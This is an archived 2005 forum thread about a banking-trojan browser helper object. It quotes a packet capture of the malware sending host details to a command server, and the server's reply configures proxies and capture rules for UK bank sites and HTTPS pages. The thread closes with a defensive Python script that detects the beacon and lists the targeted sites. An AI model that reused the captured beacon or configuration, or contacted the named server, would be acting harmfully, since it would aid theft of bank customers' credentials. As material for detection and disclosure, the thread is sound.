Re: My puter was "calling home" to 83.149.82.168
grom_home
07-10-2005, 03:10 AM
-rehn- Wrote:
> I have manually removed a malware from my system.
> It was opening a lot of ports.
> And every time it opened a new port
> it was "calling home" to 83.149.82.168
>
> I can provide a full Ethereal dump
> and the 3 "bad" files I found
> if anybody is interested.
>
> I have sent an email to the ISP's abuse address.
>
> This is what Ethereal extracted:
>
> POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
> Host: nugget-sales.com
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 108
> Accept: */*
> Accept-Language: en
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
> Connection: close
>
> i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210&k=37103&m=37103&panic=0&c=United Kingdom&l=ENG&mo=0
> HTTP/1.1 200 OK
> Date: Mon, 18 Apr 2005 04:00:09 GMT
> Server: Apache/2.0.40 (Red Hat Linux)
> Content-Length: 671
> Connection: close
> Content-Type: text/html; charset=ISO-8859-1
>
> http +'www.microsoft.com' (http://www.microsoft.com/) +Ba "Mozilla/4.0
> (compatible\; MSIE 6.0\;
> Windows NT 5.1)"
> rmold
> socks 0.0.0.0:65535
> httpp +0.0.0.0:65535
> log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer
> -qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
> setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 1 *.lloydstsb.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 2 *.nwolb.com* * * +urfKPMWS 4096 2 200000
> setwnd 3 *.hsbc.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 4 *.barclays.co.uk* * * +urfKPMWS 4096 2 200000
> setwnd 17 'https://*' (https://*/) * * +urfKPBMW 4096 1000 2
> setwnd 18 * 'https://*' (https://*/) * +urfKPBMW 4096 1000 2
> setwnd 19 * * * +urfKP*MW 4096 2
> http #hosts +I 60000


Hi, I found this baby on four PCs/servers in our network.
I took the same approach you did but found nothing.
Then I ran "HijackThis" and did a scan.
I located a strange BHO (Browser Helper Object) pointing to a dll in
\windows\system32. It had a different name on all machines but always
looked like a MS file. It did not have a version info tab in the
properties though. It was about 71 KB and accompanied by a .dat file with
the same name.
I tried to delete it but it was in use, so I used a tool which can do that
at startup. When the file was gone, so was the traffic to
nugget-sales.com. It was not detected by any antivirus or antispyware
engine, so I reported it to virus@ca.com. They have now analyzed it and
confirmed it to be malware.
Good luck,
Ruud


--
grom_home
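For anyone checking their own proxy captures against this sample, here is an added example (not code from either poster) that recognises the ref.cgi check-in request quoted above and lists the URL patterns named in the server's setwnd reply. The samples are reconstructed from the quoted dump with the mail line-wrapping undone; that the setwnd patterns denote sites the bot is told to watch is an assumption drawn from reading the reply, not a documented format.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the check-in request as quoted in the thread, with the
# body rejoined onto one line (its length matches the Content-Length of 108).
BEACON_REQUEST = """POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
Host: nugget-sales.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

i=2246824488&v=2805&os=WinNT5.1-2600&s=&h=&d=0&b=0&u=210&k=37103&m=37103&panic=0&c=United Kingdom&l=ENG&mo=0
"""

# Constructed sample: a subset of the server's reply lines from the same dump.
CONFIG_REPLY = """rmold
socks 0.0.0.0:65535
httpp +0.0.0.0:65535
setwnd 0 *halifax-online.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 1 *.lloydstsb.co.uk* * * +urfKPMWS 4096 2 200000
setwnd 17 'https://*' (https://*/) * * +urfKPBMW 4096 1000 2
"""

# Form fields every check-in in the dump carries; used as the match signature.
BEACON_KEYS = {"i", "v", "os", "k", "m", "panic"}


def parse_beacon(raw_request):
    """Return the check-in form fields if the request looks like the ref.cgi
    beacon (POST to .../ref.cgi with the signature keys), otherwise None."""
    head, _, body = raw_request.partition("\n\n")
    method, target, _ = head.splitlines()[0].split(" ", 2)
    path = urlsplit(target).path  # drop the timestamp query string
    fields = {k: v[0] for k, v in
              parse_qs(body.strip(), keep_blank_values=True).items()}
    if method != "POST" or not path.endswith("/ref.cgi"):
        return None
    if not BEACON_KEYS.issubset(fields):
        return None
    return fields


def targeted_patterns(config_text):
    """Return (window id, URL pattern) pairs from the reply's setwnd lines,
    assumed here to be the sites the bot is instructed to watch."""
    found = []
    for line in config_text.splitlines():
        m = re.match(r"setwnd\s+(\d+)\s+(\S+)", line)
        if m:
            found.append((int(m.group(1)), m.group(2).strip("'")))
    return found
```

Comparing the extracted patterns with your own proxy logs shows which users visited a watched site while the beacon was active.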